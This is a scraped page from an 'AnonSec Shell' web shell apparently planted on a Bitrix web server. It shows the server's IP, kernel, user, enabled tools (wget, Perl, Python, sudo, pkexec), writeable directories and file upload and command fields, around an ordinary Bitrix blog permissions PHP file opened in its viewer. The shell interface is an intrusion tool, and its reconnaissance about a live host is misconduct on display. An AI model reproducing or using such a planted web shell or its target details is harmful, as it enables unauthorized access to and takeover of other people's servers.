AnonSec Shell
Server IP : 85.193.89.191  /  Your IP : 3.133.147.142
Web Server : Apache
System : Linux 956367-cx40159.tmweb.ru 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
User : bitrix ( 600)
PHP Version : 8.1.27
Disable Function : NONE
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/bitrix/www/bitrix/modules/blog/general/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/bitrix/www/bitrix/modules/blog/general/sonet.php
<?php

class CBlogSoNetPost
{
	public static function CanUserDeletePost($ID, $userID, $blogOwnerID, $groupOwnerID)
	{
		$ID = intval($ID);
		$userID = intval($userID);
		$blogOwnerID = intval($blogOwnerID);
		$groupOwnerID = intval($groupOwnerID);

		$blogModulePermissions = $GLOBALS["APPLICATION"]->GetGroupRight("blog");
		if ($blogModulePermissions >= "W")
			return True;
	
		$arPost = CBlogPost::GetByID($ID);

		if (empty($arPost))
			return False;
			
		if($groupOwnerID > 0)
		{
			$arBlogUser = CBlogUser::GetByID($userID, BLOG_BY_USER_ID);
			if ($arBlogUser && $arBlogUser["ALLOW_POST"] != "Y")
				return False;

			$perms = BLOG_PERMS_DENY;
			if (CSocNetFeaturesPerms::CanPerformOperation($userID, SONET_ENTITY_GROUP, $groupOwnerID, "blog", "view_post"))
				$perms = BLOG_PERMS_READ;
			if (CSocNetFeaturesPerms::CanPerformOperation($userID, SONET_ENTITY_GROUP, $groupOwnerID, "blog", "write_post"))
				$perms = BLOG_PERMS_WRITE;
			if (CSocNetFeaturesPerms::CanPerformOperation($userID, SONET_ENTITY_GROUP, $groupOwnerID, "blog", "full_post"))
				$perms = BLOG_PERMS_FULL;

			if($perms >= BLOG_PERMS_WRITE  && $arPost["AUTHOR_ID"] == $userID)
				return true;

			if($perms > BLOG_PERMS_WRITE)
				return true;
		
		}
		else
		{
			$arBlog = CBlog::GetByID($arPost["BLOG_ID"]);

			$arBlogUser = CBlogUser::GetByID($userID, BLOG_BY_USER_ID);
			if ($arBlogUser && $arBlogUser["ALLOW_POST"] != "Y")
				return False;

			$perms = BLOG_PERMS_DENY;
			if (CSocNetFeaturesPerms::CanPerformOperation($userID, SONET_ENTITY_USER, $blogOwnerID, "blog", "view_post"))
				$perms = BLOG_PERMS_READ;
			if (CSocNetFeaturesPerms::CanPerformOperation($userID, SONET_ENTITY_USER, $blogOwnerID, "blog", "write_post"))
				$perms = BLOG_PERMS_WRITE;
			if (CSocNetFeaturesPerms::CanPerformOperation($userID, SONET_ENTITY_USER, $blogOwnerID, "blog", "full_post"))
				$perms = BLOG_PERMS_FULL;

			if($perms >= BLOG_PERMS_WRITE  && $arPost["AUTHOR_ID"] == $userID)
				return true;

			if($perms > BLOG_PERMS_WRITE)
				return true;
		}
		
		return False;
	}
	
	public static function OnGroupDelete($ID)
	{
		$ID = intval($ID);
		if($ID <= 0)
			return false;
		$arBlog = CBlog::GetBySocNetGroupID($ID);
		if(!empty($arBlog))
		{
			CBlog::Delete($arBlog["ID"]);
		}

		\Bitrix\Blog\PostSocnetRightsTable::deleteByEntity('SG'.$ID);
		\Bitrix\Blog\PostSocnetRightsTable::deleteByEntity('SG'.$ID.'_A');
		\Bitrix\Blog\PostSocnetRightsTable::deleteByEntity('SG'.$ID.'_E');
		\Bitrix\Blog\PostSocnetRightsTable::deleteByEntity('SG'.$ID.'_K');
		\Bitrix\Blog\PostSocnetRightsTable::deleteByEntity('OSG'.$ID.'_L');
	}
}

Anon7 - 2022
AnonSec Team